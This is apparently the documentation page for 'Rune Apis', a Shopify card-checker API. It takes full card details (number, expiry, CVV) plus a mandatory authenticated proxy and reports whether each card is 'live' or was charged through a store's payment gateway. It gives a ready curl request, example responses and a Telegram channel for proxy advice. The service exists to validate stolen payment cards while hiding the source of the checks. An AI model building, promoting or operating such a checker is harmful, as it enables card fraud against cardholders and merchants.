Rune Apis

High-Performance Shopify Card Checker API

v2.0 Stable Dev: @Po9nstar Channel: @Runeapi 🔒 Proxy Required

📝 API Endpoint

GET /shopify?
  site=STORE_URL&
  cc=CC|MM|YYYY|CVV&
  proxy=PROTO://USER:PASS@HOST:PORT *REQUIRED*

* All 3 params (site, cc, proxy) are mandatory. Requests without proxy will be rejected.

📋 Parameters

ParamTypeRequiredDescription
sitestringYESShopify store URL (e.g. example.com)
ccstringYESCard details: NUMBER|MM|YYYY|CVV
proxystringYESProxy with auth: socks5://user:pass@host:port

🚀 Quick Start

Replace the values below and open in browser or use curl:

curl "https://YOUR_HOST/shopify?site=example.com&cc=4111111111111111|12|2028|123&proxy=socks5://user:pass@host:1080"
Try Example Request Join Telegram

📄 Example Response

Successful check response:

{
  "Gateway": "Stripe Card Payments",
  "Price": 25.99,
  "Response": "CARD_DECLINED",
  "Status": true,
  "approved": false,
  "by": "@Po9nstar",
  "cc": "4111111111111111|12|2028|123",
  "charged": false
}

Approved (OTP Required) response:

{
  "Gateway": "Stripe Card Payments",
  "Price": 9.99,
  "Response": "OTP_REQUIRED",
  "Status": true,
  "approved": true,
  "by": "@Po9nstar",
  "cc": "5555555555554444|01|2027|321",
  "charged": false
}

Error response (missing proxy):

{
  "error": "Missing required 'proxy' parameter",
  "status": false
}

🔧 Response Fields

FieldTypeDescription
GatewaystringPayment gateway name
PricefloatProduct price
ResponsestringCard response message
StatusboolRequest completed successfully
approvedboolCard was approved / live
chargedboolOrder was actually placed
ccstringCard used for the check
bystringAPI developer
⚠️ Important: A proxy is always required for all requests. Use SOCKS5 or HTTP proxies with authentication. Free proxies will be rate-limited and blocked. Join our Telegram for proxy recommendations and updates.